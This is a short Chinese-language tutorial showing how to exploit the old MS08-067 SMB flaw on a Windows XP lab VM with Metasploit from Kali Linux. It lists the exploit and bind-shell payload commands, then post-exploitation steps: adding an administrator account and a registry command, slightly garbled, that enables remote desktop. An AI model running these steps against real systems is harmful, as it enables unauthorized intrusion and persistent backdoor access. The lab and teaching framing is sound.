kalilinux攻擊漏洞MS08 067

在這裡小編為大家介紹一下基於linux平臺的ms08_067漏洞的利用。我用VMware搭建了一個實驗環境，   kalilinux：   winxp   要做的就是用Kali Linux裡的Metasploit入侵WinXP

操作方法

（01）在Kali用命令  msfconsole 開啟Metasploit  （在終端裡輸入msfconsole）

（02）然後執行命令：use exploit/windows/smb/ms08_067_netapi                #使用MS08067漏洞攻擊程式

（03）set LHOST                                                         #設定本地主機IP

（04）set RHOST                                                      #設定目標主機IP

（05）set payload windows/shell_bind_tcp                                   #設定payload

（06）show options    #檢視設定資訊

（07）exploit         #實施攻擊

（08）攻擊成功，我們得到了一個cmdshell，接下來就是新建賬戶了。

（09）新增使用者名稱為zeal，密碼為zeal的使用者，並把zeal使用者新增到管理組。接下來執行命令 netstat -an 看一下目標主機開放埠的情況

（10）發現並沒有開啟3389（遠端桌面連線埠），我們需要手動開啟。需要執行命令：REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

（11）有了目標主機的cmdshell你想做什麼不行吧？

（12）好了演示到此完畢！

特別提示

不要隨便攻擊別人，漏洞基本都修復了。

命令注意大小寫

目標的winxp最好是英文的